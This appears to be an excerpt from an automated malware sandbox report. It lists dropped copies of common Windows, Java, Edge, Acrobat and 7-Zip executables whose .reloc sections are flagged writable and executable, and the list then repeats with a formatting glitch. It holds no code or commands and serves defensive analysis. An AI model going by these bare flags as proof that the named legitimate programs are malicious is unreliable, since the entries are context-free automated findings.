              Source: javacpl.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaw.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe0.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jjs.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jp2launcher.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: keytool.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: kinit.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: DiagnosticsHub.StandardCollector.Service.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: klist.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: FXSSVC.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: PerceptionSimulationService.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: perfhost.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Locator.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MsSense.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SensorDataService.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: snmptrap.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ktab.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: orbd.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pack200.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: policytool.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmid.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmiregistry.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: servertool.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssvagent.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: tnameserv.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: unpack200.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Spectrum.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssh-agent.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: TieringEngineService.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AgentService.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vds.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: VSSVC.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wbengine.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: WmiApSrv.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wmpnetwk.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SearchIndexer.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ie_to_edge_stub.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: cookie_exporter.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: identity_helper.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: setup.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedgewebview2.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_pwa_launcher.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: notification_click_helper.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pwahelper.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe0.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7z.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7zFM.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7zG.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Acrobat.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcrobatInfo.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: acrobat_sl.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroBroker.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroCEF.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pwahelper.exe0.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javacpl.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaw.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jjs.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jp2launcher.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: keytool.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: kinit.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: DiagnosticsHub.StandardCollector.Service.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: klist.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: FXSSVC.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: PerceptionSimulationService.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: perfhost.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Locator.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MsSense.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SensorDataService.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: snmptrap.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ktab.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: orbd.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pack200.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: policytool.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmid.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmiregistry.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: servertool.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssvagent.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: tnameserv.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: unpack200.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Spectrum.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssh-agent.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: TieringEngineService.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AgentService.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vds.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: VSSVC.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wbengine.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: WmiApSrv.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wmpnetwk.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SearchIndexer.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ie_to_edge_stub.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: cookie_exporter.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: identity_helper.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: setup.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedgewebview2.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_pwa_launcher.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: notification_click_helper.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pwahelper.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7z.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7zFM.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
